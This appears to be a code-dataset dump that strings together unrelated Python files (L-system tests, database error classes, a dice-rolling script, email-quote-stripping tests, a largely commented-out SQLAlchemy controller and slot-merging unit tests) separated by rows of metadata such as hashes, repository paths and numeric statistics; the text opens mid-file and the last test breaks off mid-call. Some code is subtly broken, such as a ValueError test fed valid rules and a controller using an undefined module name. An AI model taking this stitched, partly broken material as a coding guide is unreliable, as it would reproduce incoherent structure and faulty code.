axiom = f['axiom'].upper().replace(" ", "")
depth = 2
rule = lsys.Lsys.clean_rule(f['rule'])
result = lsys.Lsys.expand(axiom, rule, depth)
assert(result == result_at_depth_2[n].replace(".", "|"))
@pytest.mark.parametrize(('rule', 'expected'),
[("X ; X+YF+, Y ; -FX-Y", {'X': 'X+YF+',
'Y': '-FX-Y'}),
("X to X+yF+; y to -fX-y",
{'X': 'X+YF+', 'Y': '-FX-Y'}),
('X - FX+FX+FXFY-FY-; Y - +FX+FXFY-FY-FY, F= V',
{'F': 'V', 'X': 'FX+FX+FXFY-FY-',
'Y': '+FX+FXFY-FY-FY'}),
('F is |[+F]|[-F]+F', {'F': '|[+F]|[-F]+F'}),
(['F', '|[+F]|[-F]+F'], {'F': '|[+F]|[-F]+F'})
])
def test_raise_ValueError_clean_rule(rule, expected):
with pytest.raises(ValueError) as e:
rule_result = lsys.Lsys.clean_rule(rule)
def test_raise_MemoryError_process():
dragon = lsys.fractals.Fractal['Dragon']
axiom = dragon['axiom']
rule = lsys.Lsys.clean_rule(dragon['rule'])
depth = 22
with pytest.raises(MemoryError) as e:
string = lsys.Lsys.expand(axiom, rule, depth)
def test_Lsys_setters():
dic = {
"axiom": 'F',
"rule": {'F': 'F-F+F'},
"depth": 3,
"a0": 90,
"da": 120,
"step": 1,
"ds": 1,
"unoise": 0,
"forward": 'F',
"bar": "|",
"right": "+",
"left": "-",
"goto": 'G',
"ignore": 'X',
"memory_check": False,
}
d = lsys.Lsys()
for attr, val in dic.items():
setattr(d, attr, val)
assert hasattr(d, attr)
assert getattr(d, attr) == val
props = [
"vocab",
"commands",
"coords",
"depths",
"x",
"y",
"_bezier_coords",
"_bezier_x",
"_bezier_y",
"string",
"_string_stale",
"_coord_stale",
"_bezier_stale",
]
for p in props:
getattr(d, p)
assert hasattr(d, p)
| 41.355856 | 93 | 0.427731 | 1,956 | 9,181 | 1.978528 | 0.0818 | 0.205685 | 0.229457 | 0.232558 | 0.652196 | 0.636693 | 0.623256 | 0.58553 | 0.575711 | 0.549612 | 0 | 0.073314 | 0.203682 | 9,181 | 221 | 94 | 41.542986 | 0.456025 | 0.012308 | 0 | 0.092896 | 0 | 0.382514 | 0.586378 | 0.460536 | 0 | 0 | 0 | 0 | 0.032787 | 1 | 0.032787 | false | 0 | 0.016393 | 0 | 0.04918 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8ef2f42d99c1a591b8f7d8f891b74ac549843b58 | 192 | py | Python | services/traction/api/db/errors.py | ianco/traction | e7c934edd52155489a842066de457fc400eb7372 | [
"Apache-2.0"
] | 12 | 2022-01-29T20:30:03.000Z | 2022-03-29T11:46:14.000Z | services/traction/api/db/errors.py | ianco/traction | e7c934edd52155489a842066de457fc400eb7372 | [
"Apache-2.0"
] | 38 | 2021-11-22T17:52:50.000Z | 2022-03-31T17:52:00.000Z | services/traction/api/db/errors.py | ianco/traction | e7c934edd52155489a842066de457fc400eb7372 | [
"Apache-2.0"
] | 9 | 2021-11-22T18:05:48.000Z | 2022-03-29T11:25:08.000Z | class DoesNotExist(Exception):
"""Raised when entity was not found in database."""
class AlreadyExists(Exception):
"""Raised when entity already exists with matching unique data."""
| 27.428571 | 70 | 0.734375 | 23 | 192 | 6.130435 | 0.782609 | 0.212766 | 0.269504 | 0.35461 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161458 | 192 | 6 | 71 | 32 | 0.875776 | 0.552083 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
d902275896623efb8f3268c9abbbdfec792f7682 | 43 | py | Python | livestock3d/__init__.py | kmarburger/livestock3d | 767e6bd1b7658357f720e112d550416cb7c45226 | [
"MIT"
] | 1 | 2021-03-05T16:46:30.000Z | 2021-03-05T16:46:30.000Z | livestock3d/__init__.py | kmarburger/livestock3d | 767e6bd1b7658357f720e112d550416cb7c45226 | [
"MIT"
] | 1 | 2018-06-22T11:40:15.000Z | 2018-06-27T16:35:45.000Z | livestock3d/__init__.py | kmarburger/livestock3d | 767e6bd1b7658357f720e112d550416cb7c45226 | [
"MIT"
] | 4 | 2018-03-29T19:41:01.000Z | 2019-12-06T14:06:46.000Z | from . import livestock3d
from . import ssh | 21.5 | 25 | 0.790698 | 6 | 43 | 5.666667 | 0.666667 | 0.588235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027778 | 0.162791 | 43 | 2 | 26 | 21.5 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d9110c0bfbed6fe6cead147f683fe70c7713477a | 920 | py | Python | 9/9.14/dice.py | singi2016cn/python-scaffold | 274e508d1919da67e599aa73be139800c043bce4 | [
"MIT"
] | null | null | null | 9/9.14/dice.py | singi2016cn/python-scaffold | 274e508d1919da67e599aa73be139800c043bce4 | [
"MIT"
] | null | null | null | 9/9.14/dice.py | singi2016cn/python-scaffold | 274e508d1919da67e599aa73be139800c043bce4 | [
"MIT"
] | null | null | null | """骰子"""
from random import randint
class Die:
"""骰子"""
def __init__(self, side=6):
self.side = side
def roll_die(self):
return randint(1, self.side)
dice = Die()
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
dice = Die(10)
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
dice = Die(20)
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
| 18.039216 | 36 | 0.694565 | 153 | 920 | 3.947712 | 0.124183 | 0.359272 | 0.645695 | 0.794702 | 0.822848 | 0.822848 | 0.822848 | 0.822848 | 0.822848 | 0.822848 | 0 | 0.007273 | 0.103261 | 920 | 50 | 37 | 18.4 | 0.724848 | 0.005435 | 0 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0 | 0.025641 | 0.025641 | 0.128205 | 0.769231 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 11 |
d92d702aa0b7987d164347f91332115771bab3f5 | 4,116 | py | Python | threaded_messages/tests.py | MattBlack85/django-threaded-messages | da86dea6dd854f9ab37201d3953f9d028faa85e9 | [
"MIT"
] | null | null | null | threaded_messages/tests.py | MattBlack85/django-threaded-messages | da86dea6dd854f9ab37201d3953f9d028faa85e9 | [
"MIT"
] | null | null | null | threaded_messages/tests.py | MattBlack85/django-threaded-messages | da86dea6dd854f9ab37201d3953f9d028faa85e9 | [
"MIT"
] | 1 | 2021-01-06T14:41:13.000Z | 2021-01-06T14:41:13.000Z | from django.test import TestCase
from .utils import strip_mail
class UtilsTest(TestCase):
def test_strip_quotes(self):
body = """nyan nyan nyan nyan nyan
nyan nyan nyan nyan nyan
nyan nyan nyan nyan nyan
2011/10/28 Nyan Cat <nyan@nyan.cat>:
> hey guys
> sarete il 31 dicembre con Pascal a Firenze?
> lo spero tanto, nel caso ditemi qualcosa...
>
>>>
>
>>
>"""
body_stripped = """nyan nyan nyan nyan nyan
nyan nyan nyan nyan nyan
nyan nyan nyan nyan nyan
"""
self.assertEquals(body_stripped.strip(), strip_mail(body).strip())
def test_single_line_quotes(self):
body = 'asfasf\n\nOn Thu, Dec 15, 2011 at 12:42 PM, Fabrizio S. <messaging@email.gidsy.com>wrote:\n\n> [image: Gidsy] New message\n> Hi Fabrizio, Andrew M. sent you a message\n>\n> *blabla*\n> gasg\n>\n> View and reply<http://email.gidsy.com/wf/click?c=e36x8iH5CyW6UFPc7U%2FiBSpwHwOcqQc55u6Od0IAvnJWLQwR0RdOslgfJYtFkOT0&rp=7%2Bq%2FuBUXPhfnWd079jPZDJw1s3xtQcNITJcDWjO98HB8tJ6%2BYeP23y9SaOFiXvnpboQhDnEJRnrEZfRP9WnHQiL7q9Y0Plign2S9mx7i8%2Bk%3D&u=icfx5E9JS66UPX7QM9UvGw%2Fh0>\n>\n> Sincerely,\n> the *Gidsy team*<http://email.gidsy.com/wf/click?c=nun%2FbaehJTxhIK1KvYwhU5Tg16XMq0b2DKd6IxvO%2F%2Bw%3D&rp=7%2Bq%2FuBUXPhfnWd079jPZDJw1s3xtQcNITJcDWjO98HB8tJ6%2BYeP23y9SaOFiXvnpboQhDnEJRnrEZfRP9WnHQiL7q9Y0Plign2S9mx7i8%2Bk%3D&u=icfx5E9JS66UPX7QM9UvGw%2Fh1>\n>\n> This email was intended for fabrizio@gidsy.com. If you do not want to\n> receive emails like this from staging.gidsy.com<http://email.gidsy.com/wf/click?c=e36x8iH5CyW6UFPc7U%2FiBY72qxV4NIiQfC%2BfF%2BpSEec%3D&rp=7%2Bq%2FuBUXPhfnWd079jPZDJw1s3xtQcNITJcDWjO98HB8tJ6%2BYeP23y9SaOFiXvnpboQhDnEJRnrEZfRP9WnHQiL7q9Y0Plign2S9mx7i8%2Bk%3D&u=icfx5E9JS66UPX7QM9UvGw%2Fh2>anymore, then please change your Email\n> notification settings <http://notice-email-setting/>.\n>\n> Copyright \ufffd 2011 Gidsy.com, All rights reserved.\n>\n'
body_stripped = "asfasf"
self.assertEquals(body_stripped.strip(), strip_mail(body).strip())
def test_strip_signature(self):
body = 'signature test\n\nOn Fri, Dec 16, 2011 at 11:06 AM, Fabrizio Sestito <fabrizio@gidsy.com>wrote:\n\n> test\n>\n> asd\n>\n>\n> On Fri, Dec 16, 2011 at 11:05 AM, Fabrizio Sestito <fabrizio@gidsy.com>wrote:\n>\n>> hey\n>>\n>>\n>> On Thu, Dec 15, 2011 at 4:08 PM, Fabrizio S. <messaging@email.gidsy.com>wrote:\n>>\n>>> [image: Gidsy] New message\n>>> Hi Fabrizio, Andrew M. sent you a message\n>>>\n>>> *sdfsdf*\n>>> sadasdasdasd\n>>>\n>>> View and reply<http://email.gidsy.com/wf/click?c=e36x8iH5CyW6UFPc7U%2FiBSpwHwOcqQc55u6Od0IAvnLUol8UpZle1eFZgQF40o%2FA&rp=7%2Bq%2FuBUXPhfnWd079jPZDJw1s3xtQcNITJcDWjO98HC6dm1r92yU0SpAJEPbb%2B6TYHFx5ZDq5B8IwoyftFTyY2YZCtQ%2F66rRPRshi2lf8V8%3D&u=wYte5RSXQ3KUXaXN31g4LQ%2Fh0>\n>>>\n>>> Sincerely,\n>>> the *Gidsy team*<http://email.gidsy.com/wf/click?c=nun%2FbaehJTxhIK1KvYwhU5Tg16XMq0b2DKd6IxvO%2F%2Bw%3D&rp=7%2Bq%2FuBUXPhfnWd079jPZDJw1s3xtQcNITJcDWjO98HC6dm1r92yU0SpAJEPbb%2B6TYHFx5ZDq5B8IwoyftFTyY2YZCtQ%2F66rRPRshi2lf8V8%3D&u=wYte5RSXQ3KUXaXN31g4LQ%2Fh1>\n>>>\n>>> This email was intended for fabrizio@gidsy.com. If you do not want to\n>>> receive emails like this from staging.gidsy.com<http://email.gidsy.com/wf/click?c=e36x8iH5CyW6UFPc7U%2FiBY72qxV4NIiQfC%2BfF%2BpSEec%3D&rp=7%2Bq%2FuBUXPhfnWd079jPZDJw1s3xtQcNITJcDWjO98HC6dm1r92yU0SpAJEPbb%2B6TYHFx5ZDq5B8IwoyftFTyY2YZCtQ%2F66rRPRshi2lf8V8%3D&u=wYte5RSXQ3KUXaXN31g4LQ%2Fh2>anymore, then please change your Email\n>>> notification settings <http://notice-email-setting/>.\n>>>\n>>> Copyright \ufffd 2011 Gidsy.com, All rights reserved.\n>>>\n>>\n>>\n>\n\n\n-- \nFabrizio Sestito\n'
body_stripped = "signature test"
self.assertEquals(body_stripped.strip(), strip_mail(body).strip())
def test_no_signature(self):
pass
#TODO: add support for stripped html
#body = '<div>I am some nasty html</div>'
#body_stripped = "I am some nasty html"
#self.assertEquals(body_stripped.strip(), strip_mail(body).strip())
| 72.210526 | 1,593 | 0.741983 | 540 | 4,116 | 5.614815 | 0.288889 | 0.076517 | 0.102902 | 0.126649 | 0.810686 | 0.790897 | 0.778694 | 0.778694 | 0.778694 | 0.644459 | 0 | 0.095251 | 0.130224 | 4,116 | 56 | 1,594 | 73.5 | 0.751676 | 0.043489 | 0 | 0.225806 | 0 | 0.064516 | 0.832443 | 0.050598 | 0 | 0 | 0 | 0.017857 | 0.096774 | 1 | 0.129032 | false | 0.032258 | 0.064516 | 0 | 0.225806 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
d95ed8ca89a8e32c527f194d3bb84298b5bdb65c | 4,377 | py | Python | Controllers/cont_ms_roadbase.py | acadianshadow237/BA_MDI1 | 73e0e87c15ff083ce860f7a09fa2de3a3c71c215 | [
"MIT"
] | null | null | null | Controllers/cont_ms_roadbase.py | acadianshadow237/BA_MDI1 | 73e0e87c15ff083ce860f7a09fa2de3a3c71c215 | [
"MIT"
] | null | null | null | Controllers/cont_ms_roadbase.py | acadianshadow237/BA_MDI1 | 73e0e87c15ff083ce860f7a09fa2de3a3c71c215 | [
"MIT"
] | null | null | null |
#import Models.my_tables_model as db_mbm
##import cont_RoadBase.viewmodels as rb
#----------------------------------------------------------------------
def getAllRecords(session):
"""
Get all records and return them
"""
result = session.query(rb.VBase).order_by(rb.VBase.Name,rb.VBase.From).all()
return result
#def getOneRecordBy_id(session,m_id):
# """
# Get one records and return it based in its id
# """
# result = session.query(rb.VBase).filter_by(id = m_id).all()
# return result
#def getRecordBy_RoadName(session,m_RoadName):
# """
# Get one records and return it based in its RoadName
# """
# result = session.query(rb.VBase).filter_by(id = m_roadName).order_by(From).all()
# return result
#def addNewRecord(session,m_data):
# b1= db_mbmBase(
# id = m_data.id,
# Name = m_data.Name,
# SelectRole = m_data.SelectRole,
# UpDateRole = m_data.UpDateRole,
# DeleteRole = m_data.DeleteRole,
# Route_Class = m_data.Route_Class,
# Route_ID = m_data.Route_ID,
# Pass_Direction = m_data.Pass_Direction,
# Inventory_Number = m_data.Inventory_Number,
# id_1 = m_data.id_1,
# Street_Name = m_data.Street_Name,
# zz_Deighton_Fix = m_data.zz_Deighton_Fix,
# data_accum_direction = m_data.data_accum_direction,
# County = m_data.County,
# Segment_Number = m_data.Segment_Number )
# c1 = db_mbmChunk(
# id = m_data.ChunkID,
# Length = m_data.Length,
# Geo = m_data.Map)
# bc1 = db_mbmBaseChunk(
# id = m_data.NetworkID,
# lprid = m_data.id,
# ChunkID = m_data.ChunkID,
# FromMeasure = m_data.FromMeasure,
# ToMeasure = m_data.ToMeasure,
# From = m_data.From,
# To = m_data.To,
# ValidOn = m_data.ValidOn,
# ValidTo = m_data.ValidTo,
# CreatedOn = m_data.CreatedOn,
# EndedOn = m_data.EndedOn,
# Map = m_data.Map,
# Offset = m_data.Offset,
# End = m_data.End)
# session.add(b1)
# session.add(c1)
# session.add(bc1)
# session.commit()
#def deleteRecordByID(session,m_id):
# """
# delete a single record by id
# """
# r1=session.query(rb.VBase).filter(id == m_id).one()
# b1 = session.query(db_mbmBase).filter(id == r1.id)
# c1 = session.query(db_mbmChunk).filter(id == r1.ChunkID)
# bc1 = session.query(db_mbmBaseChunk).filter(id == r1.NetworkID)
# session.delete(b1)
# session.delete(c1)
# session.delete(bc1)
# session.commit()
#def upDateRecord(session,m_id,m_data):
# vb1 = session.query(rb.VBase).filter(id == m_id).one()
# b1 = session.query(db_mbmBase).filter(id == vb1.id)
# c1 = session.query(db_mbmChunk).filter(id == vb1.ChunkID)
# bc1 = session.query(db_mbmBaseChunk).filter(id = vb1.NetworkID)
# b1= db_mbmBase(
# id = m_data.id,
# Name = m_data.Name,
# SelectRole = m_data.SelectRole,
# UpDateRole = m_data.UpDateRole,
# DeleteRole = m_data.DeleteRole,
# Route_Class = m_data.Route_Class,
# Route_ID = m_data.Route_ID,
# Pass_Direction = m_data.Pass_Direction,
# Inventory_Number = m_data.Inventory_Number,
# id_1 = m_data.id_1,
# Street_Name = m_data.Street_Name,
# zz_Deighton_Fix = m_data.zz_Deighton_Fix,
# data_accum_direction = m_data.data_accum_direction,
# County = m_data.County,
# Segment_Number = m_data.Segment_Number )
# c1 = db_mbmChunk(
# id = m_data.ChunkID,
# Length = m_data.Length,
# Geo = m_data.Map)
# bc1 = db_mbmBaseChunk(
# id = m_data.NetworkID,
# lprid = m_data.id,
# ChunkID = m_data.ChunkID,
# FromMeasure = m_data.FromMeasure,
# ToMeasure = m_data.ToMeasure,
# From = m_data.From,
# To = m_data.To,
# ValidOn = m_data.ValidOn,
# ValidTo = m_data.ValidTo,
# CreatedOn = m_data.CreatedOn,
# EndedOn = m_data.EndedOn,
# Map = m_data.Map,
# Offset = m_data.Offset,
# End = m_data.End)
# session.add(b1)
# session.add(c1)
# session.add(bc1)
# session.commit()
| 29.979452 | 85 | 0.581677 | 548 | 4,377 | 4.390511 | 0.162409 | 0.137157 | 0.026185 | 0.039485 | 0.814214 | 0.785536 | 0.785536 | 0.785536 | 0.720698 | 0.66251 | 0 | 0.01049 | 0.281243 | 4,377 | 145 | 86 | 30.186207 | 0.754291 | 0.898104 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
794cf051ead9cd18c6781a5e58b461962fdf1b22 | 14,699 | py | Python | services/common/tests/slots/test_merge.py | rtubio/server | 3bb15f4d4dcd543d6f95d1fda2cb737de0bb9a9b | [
"Apache-2.0"
] | 4 | 2015-03-23T16:34:53.000Z | 2017-12-12T11:41:54.000Z | services/common/tests/slots/test_merge.py | rtubio/server | 3bb15f4d4dcd543d6f95d1fda2cb737de0bb9a9b | [
"Apache-2.0"
] | 42 | 2015-01-08T22:21:04.000Z | 2021-12-13T19:48:44.000Z | services/common/tests/slots/test_merge.py | rtubio/server | 3bb15f4d4dcd543d6f95d1fda2cb737de0bb9a9b | [
"Apache-2.0"
] | 2 | 2015-04-04T15:23:35.000Z | 2017-07-23T23:14:06.000Z | """
Copyright 2013, 2014 Ricardo Tubio-Pardavila
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__author__ = 'rtubiopa@calpoly.edu'
from datetime import timedelta
from django import test
from services.common import misc, slots
class MergeSlotsTest(test.TestCase):
def setUp(self):
self.__verbose_testing = False
def test_merge_none(self):
"""UNIT test: services.common.slots.merge_slots (robustness)
Nones and empties test.
"""
self.assertCountEqual(
[], slots.merge_slots(None, None),
'[] is the expected response to (None, None)'
)
self.assertCountEqual(
[], slots.merge_slots([], []),
'[] is the expected response to ([], [])'
)
def test_merge_case_a(self):
"""UNIT test: services.common.slots.merge_slots (case A)
Case A for merging slots.
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, CASE A')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc(),
misc.get_today_utc() + timedelta(hours=1))
m = (misc.get_today_utc() + timedelta(hours=1),
misc.get_today_utc() + timedelta(hours=4))
expected_s = [p]
actual_s = slots.merge_slots([p], [m])
if self.__verbose_testing:
misc.print_list(p, name='(+) slots')
misc.print_list(m, name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(expected_s, actual_s, 'CASE A: Wrong result!')
def test_merge_case_b(self):
"""UNIT test: services.common.slots.merge_slots (case B)
Case B for merging slots.
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, CASE B')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc(),
misc.get_today_utc() + timedelta(hours=1, minutes=20))
m = (misc.get_today_utc() + timedelta(hours=1),
misc.get_today_utc() + timedelta(hours=4))
expected_s = [(p[0], m[0])]
actual_s = slots.merge_slots([p], [m])
if self.__verbose_testing:
misc.print_list(p, name='(+) slots')
misc.print_list(m, name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(expected_s, actual_s, 'CASE B: Wrong result!')
def test_merge_case_c(self):
"""UNIT test: services.common.slots.merge_slots (case C)
Case C for merging slots.
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, CASE C')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc(),
misc.get_today_utc() + timedelta(hours=5))
m = (misc.get_today_utc() + timedelta(hours=1),
misc.get_today_utc() + timedelta(hours=4))
expected_s = [(p[0], m[0]), (m[1], p[1])]
actual_s = slots.merge_slots([p], [m])
if self.__verbose_testing:
misc.print_list(p, name='(+) slots')
misc.print_list(m, name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(expected_s, actual_s, 'CASE C: Wrong result!')
def test_merge_case_d(self):
"""UNIT test: services.common.slots.merge_slots (case D)
Case D for merging slots.
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, CASE D')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=5))
m = (misc.get_today_utc() + timedelta(hours=1),
misc.get_today_utc() + timedelta(hours=4))
expected_s = [(m[1], p[1])]
actual_s = slots.merge_slots([p], [m])
if self.__verbose_testing:
misc.print_list(p, name='(+) slots')
misc.print_list(m, name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(expected_s, actual_s, 'CASE D: Wrong result!')
def test_merge_case_e(self):
"""UNIT test: services.common.slots.merge_slots (case E)
Case E for merging slots.
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, CASE E')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=3))
m = (misc.get_today_utc() + timedelta(hours=1),
misc.get_today_utc() + timedelta(hours=4))
expected_s = []
actual_s = slots.merge_slots([p], [m])
if self.__verbose_testing:
misc.print_list(p, name='(+) slots')
misc.print_list(m, name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(expected_s, actual_s, 'CASE E: Wrong result!')
def test_merge_case_f(self):
"""UNIT test: services.common.slots.merge_slots (case F)
Case F for merging slots.
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, CASE F')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=3))
m = (misc.get_today_utc() + timedelta(hours=0),
misc.get_today_utc() + timedelta(hours=1))
expected_s = [p]
actual_s = slots.merge_slots([p], [m])
if self.__verbose_testing:
misc.print_list(p, name='(+) slots')
misc.print_list(m, name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(expected_s, actual_s, 'CASE F: Wrong result!')
def test_merge_case_no_m_slots(self):
"""UNIT test: services.common.slots.merge_slots (p slots)
Case merging p slots without m slots.
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, CASE NONE M SLOTS')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=3))
q = (misc.get_today_utc() + timedelta(hours=4),
misc.get_today_utc() + timedelta(hours=5))
r = (misc.get_today_utc() + timedelta(hours=6),
misc.get_today_utc() + timedelta(hours=7))
s = (misc.get_today_utc() + timedelta(hours=8),
misc.get_today_utc() + timedelta(hours=9))
expected_s = [p, q, r, s]
actual_s = slots.merge_slots([p, q, r, s], [])
if self.__verbose_testing:
misc.print_list(p, name='(+) slots')
misc.print_list([], name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(
expected_s, actual_s, 'CASE NONE M: Wrong result!'
)
def test_merge_case_multiple_end(self):
"""UNIT test: services.common.slots.merge_slots (multiple + slots)
Case merging multiple ending (+) slots)
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, CASE MULITPLE (+)')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=3))
q = (misc.get_today_utc() + timedelta(hours=4),
misc.get_today_utc() + timedelta(hours=5))
r = (misc.get_today_utc() + timedelta(hours=6),
misc.get_today_utc() + timedelta(hours=7))
s = (misc.get_today_utc() + timedelta(hours=8),
misc.get_today_utc() + timedelta(hours=9))
m = (misc.get_today_utc() + timedelta(hours=0),
misc.get_today_utc() + timedelta(hours=1))
expected_s = [p, q, r, s]
actual_s = slots.merge_slots([p, q, r, s], [m])
if self.__verbose_testing:
misc.print_list(p, name='(+) slots')
misc.print_list(m, name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(
expected_s, actual_s, 'CASE MULTIPLE: Wrong result!'
)
def test_merge_case_complex_1(self):
"""UNIT test: services.common.slots.merge_slots (complex case #1)
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, COMPLEX CASE #1')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc() + timedelta(hours=0),
misc.get_today_utc() + timedelta(hours=1))
q = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=3))
r = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=4))
s = (misc.get_today_utc() + timedelta(hours=3),
misc.get_today_utc() + timedelta(hours=5))
m = (misc.get_today_utc() + timedelta(hours=0),
misc.get_today_utc() + timedelta(hours=3))
n = (misc.get_today_utc() + timedelta(hours=3, minutes=30),
misc.get_today_utc() + timedelta(hours=4))
expected_s = [(m[1], n[0]), (s[0], n[0]), (n[1], s[1])]
actual_s = slots.merge_slots([p, q, r, s], [m, n])
if self.__verbose_testing:
misc.print_list([p, q, r, s], name='(+) slots')
misc.print_list([m, n], name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(
